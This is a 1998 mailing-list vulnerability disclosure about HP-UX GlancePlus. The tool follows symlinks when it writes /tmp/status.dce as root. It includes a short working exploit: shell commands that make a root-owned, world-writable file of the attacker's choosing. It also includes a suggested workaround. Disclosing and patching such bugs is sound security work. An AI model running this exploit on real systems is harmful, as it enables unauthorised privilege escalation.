X-RDate: Tue, 28 Apr 1998 17:10:48 +0600 (YEKST)
X-UIDL: 35317d3400000122
Date: Mon, 27 Apr 1998 23:31:12 +0200
From: "J.A. Gutierrez" <[email protected]>
To: [email protected]Subject: HP-UX glance bug (#4?)
* Software:
HP-UX B.10.20 D
Glance.Runtime.GLANCE B.10.20.95 HP GlancePlus files
* Bug:
glance creates a /tmp/status.dce file as root, and it follows
symlinks, so you can append text like
Pid: 16208 File: ndi_sm.c Line: 2609 Mon Apr 27 21:52:23 1998
Performance Management Application registered.
--------------------------------------------------------------------------
to any system file.
* Sample exploit:
$ umask 000
$ cd /tmp
$ ln -s /.test status.dce
$ glance -j 1 -iterations 1 -maxpages 1
$ ls -l /.test
-rw-rw-rw- 1 root bar 1080 Apr 27 23:06 /.test
# edit /.test to match your needs
* Workaround:
I guess creating a non writable /tmp/status.dce file
and setting the t bit on /tmp (which it seems it has
not in the default HPUX installation) would be enough
* Note: I've been looking for HP-UX bugs, and I have found
several reported holes in glance; but it seems this one
is new...
--
J.A. Gutierrez So be easy and free
when you're drinking with me
I'm a man you don't meet every day
finger me for PGP (the pogues)
